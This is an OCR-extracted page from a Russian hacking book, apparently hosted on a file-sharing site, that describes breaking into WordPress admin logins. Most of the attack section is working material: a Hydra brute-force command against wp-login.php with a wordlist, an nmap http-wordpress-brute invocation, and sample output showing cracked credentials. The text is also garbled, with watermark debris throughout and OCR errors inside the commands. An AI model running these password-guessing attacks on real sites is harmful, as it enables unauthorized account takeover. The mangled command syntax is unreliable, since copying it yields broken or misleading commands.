Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
книги хакеры / Колисниченко Д. Н. Хакинг на linux.pdf
Скачиваний:
17
Добавлен:
19.04.2024
Размер:
29.19 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

w

 

 

 

 

5.3.o

Взлом WordPress

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

 

w

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Word.Press - один из самых популярных блоговых движков, который ис­ пользует как раз два рассмотренных ранее сервиса - веб-сервер Apache (или ngi.nx, но Apache тоже довольно часто используют для WordPress) и СУБД MySQL или один из ее форков.

Попробуем взломать Word.Press через форму входа. Как правило, форма вхо­ да открывается по адресу https://<имя-caйтa>/wp-login.php. В качестве име­ ШI админа используется admin - да, мноmе админы Word.Press очень глупы

и используют стандарrную учетку. Так что одну неизвестную - имя пользо­ вателя - мы уже знаем.

Для подбора пароля WordPress удобно использовать уже знакомый нам инструмент - Hydra. Следующий пример рассчитан на то, что при неверной авторизации возвращается код 200, а при успеппюй - 302. На практике так оно и есть. Запустить Hydra можно так:

hydra -V -f -1 admin -Р /root/wordlist -t 4 http-post-fonn://111.11.11.11 -m "/wp-login.php:log=лusERл&pwdPASS Л&wp­ suЬmit=Log+In&redirect_to=http%3A%2F%2Flll.ll.ll.11%2Fwp­

admin%2F&testcookie=l:S =302"

Здесь мы используем IР-адрес жерrвы 111.11.11.11, в реальном мире нужно использовать реальный IP. Параметры команды следующие:

-/ - имя пользователя

- словарь с паролями

-t - количество потоков

http-post-form - тип формы, у нас POST

/wp-login.php - это URL страницы с авторизацией

лиsЕRл - показывает, куда подставлять имя пользователя

лрАssл - показывает, куда подставлять пароль из словаря

S=302 - указание на какой ответ оrmратъся Hydra. В нашем случае, ответ

302 при успешной авторизации

·---------------------------------------------------------------------------------

1111

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

Еслиm

все пройдет удачно, ты получишь такой вывод:

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

[ВО] [http-post-foпn] host: 111.11.11.11 lo gin: adlllin password: topsecret [STATUS] attack finished for 111.11.11.11 (valid pair found)

1 of 1 target successfully completed, 1 valid password found

Hydra (http://www.thc.org/thc_hydra ) finished at 2 022-02-24 06:30:00

Также подобрать пароль можно с помощью сканера nmap. Сканер nmap позволяет в том числе производить подбор паролей для веб-форм автори­ зации, если использовать скрипт http-wordpress-brute с соответствующими аргументами:

--script-args user userdb pass passdb thread firstonly=true

nmap 111.11.11.11 --script http-wordpress-brute --script-a rgs 'user= adrnin,passdЬ= /root/wordlist, http-wordpress-brute. threa d=З, brute.firstonly=true'

PORT

S TATE SERVICE REASON

80/tcp

open http

syn-ack

1 http-wordpress-brute:

 

1Accounts

10xdea dЬЗЗf:god => Login correct

1Statistics

1 Perfomed 103 guesses in 17 seconds, avera ge tps: 6

....- - . - - - ..

- - ...

- - - - - - ..

- - - ..

- - . - - - - - - - . - - - - . .

- - - . - - . . . .

- . ..

- - - - - - - - . - - - . - - . - . - - - . - .